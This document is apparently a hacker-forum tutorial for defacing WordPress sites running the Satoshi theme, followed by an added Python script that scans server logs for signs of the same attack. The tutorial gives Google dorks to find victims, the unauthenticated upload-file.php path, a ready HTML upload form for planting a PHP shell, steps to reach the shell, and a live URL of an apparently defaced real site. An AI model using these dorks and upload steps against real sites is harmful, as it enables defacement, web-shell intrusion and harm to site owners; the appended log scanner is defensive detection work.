Deface Wordpress Satoshi Theme
Assalamualaikum wr wb
Deface Wordpress Satoshi Theme Vulnerability Upload With CSRF
Extensions that can be uploaded: html, php
================================================
dork inurl:/wp-content/themes/satoshi/
intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/
intext:Design By TecnoGe Informatica
(Develop these further to find fresh ones)
================================================
Exploit: site.com/wp-content/themes/satoshi/upload-file.php
================================================
Csrf:
<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
(Save with the .html extension)
================================================
Steps:
1. Dork on Google
2. Pick a website and append the exploit path, for example https://www.site.com/wp-content/themes/satoshi/upload-file.php
(If the page is blank/empty, it is usually vulnerable)
3. Open the CSRF form you prepared
If the upload succeeds, a success message appears as shown below
4. How to call the shell
path http://target.com/wp-content/themes/satoshi/images/shell.php
Live Target: http://wordsmyth.se/wp-content/themes/satoshi/images/ha.html
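A defender-side check for the requests described in this post, as an added example that is not part of the original post: it scans web-server access logs for POSTs to the theme's upload-file.php and for .php/.html files served from the theme's images/ directory. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths and extensions as given in the post above.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"
DROP_DIR = "/wp-content/themes/satoshi/images/"
SUSPECT_EXT = (".php", ".html")
# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(method, raw_path, status):
    """Map one request to a finding kind, or None if unrelated."""
    path = unquote(raw_path.split("?", 1)[0]).lower()
    if path == UPLOAD_PATH:
        # Any POST is an upload attempt; a 200 on GET means the script is reachable.
        if method == "POST":
            return "upload-attempt"
        return "endpoint-exposed" if status == 200 else None
    if path.startswith(DROP_DIR) and path.endswith(SUSPECT_EXT) and status == 200:
        return "dropped-file-served"
    return None

def scan(lines):
    """Return (kind, ip, timestamp, path) tuples for matching log lines."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        kind = classify(m["method"], m["path"], int(m["status"])) if m else None
        if kind:
            findings.append((kind, m["ip"], m["ts"], m["path"]))
    return findings

def compromise_likely(findings):
    """True when an upload attempt is followed by a served .php/.html file."""
    kinds = [f[0] for f in findings]
    return ("upload-attempt" in kinds and
            "dropped-file-served" in kinds[kinds.index("upload-attempt"):])

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /wp-content/themes/satoshi/images/x.PHP?a=1 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/themes/satoshi/images/logo.png HTTP/1.1" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
    print("compromise likely:", compromise_likely(scan(SAMPLE_LOG)))
```

Any hit on a site that still ships this theme is a reason to remove upload-file.php and to audit the images/ directory for non-image files.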